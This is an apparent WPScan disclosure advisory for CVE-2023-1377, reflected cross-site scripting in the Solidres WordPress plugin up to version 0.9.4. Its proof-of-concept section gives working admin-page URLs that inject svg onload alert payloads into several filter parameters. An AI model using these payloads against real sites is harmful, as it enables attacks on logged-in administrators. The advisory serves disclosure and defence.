WordPress Plugin Vulnerabilities

Solidres <= 0.9.4 - Multiple Reflected XSS

Description

The plugin does not sanitise and escape numerous parameter before outputting them back in pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin

Proof of Concept

Make a logged in admin open

https://example.com/wp-admin/admin.php?page=sr-assets&filter_city_listing="><svg/onload=alert(/XSS/)>

https://example.com/wp-admin/admin.php?page=sr-reservations&filter_customer_fullname="><svg%2Fonload%3Dalert(%2FXSS-filter_customer_fullname%2F)>&filter_guest_fullname="><svg%2Fonload%3Dalert(%2FXSS-filter_guest_fullname%2F)>&filter_checkin_from="><svg/onload=alert(/XSS-filter_checkin_from/)>&filter_checkin_to="><svg/onload=alert(/XSS-filter_checkin_to/)>&filter_checkout_from="><svg/onload=alert(/XSS-filter_checkout_from/)>&filter_checkout_to="><svg/onload=alert(/XSS-filter_checkout_to/)>

Other pages & parameters are affected

Affects Plugins

Plugin icon
solidres
No known fix

References

CVE
CVE-2023-1377

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
7.5 (high)

Miscellaneous

Original Researcher
Erwan LR (WPScan)
Verified
Yes
WPVDB ID
c346ff80-c16b-4219-8983-708c64fa4a61

Timeline

Publicly Published
2023-03-13 (about 1 years ago)
Added
2023-03-13 (about 1 years ago)
Last Updated
2023-03-13 (about 1 years ago)

Other

Published
Title
Published
2014-08-01
Title
WebEngage 2.0.0 - renderer.php Multiple Parameter Reflected XSS
Published
2019-05-16
Title
Woocommerce Products Price Bulk Edit <= 2.0 - XSS
Published
2014-08-01
Title
Slideshow - Multiple Script Insertion Vulnerabilities
Published
2024-05-09
Title
Elegant Themes Divi Theme, Extra Theme, Divi Page Builder <= 4.25.0 - Authenticated (Contributor+) DOM-Based Stored Cross-Site Scripting
Published
2021-11-11
Title
Caldera forms < 1.9.5 - Admin+ Stored Cross-Site Scripting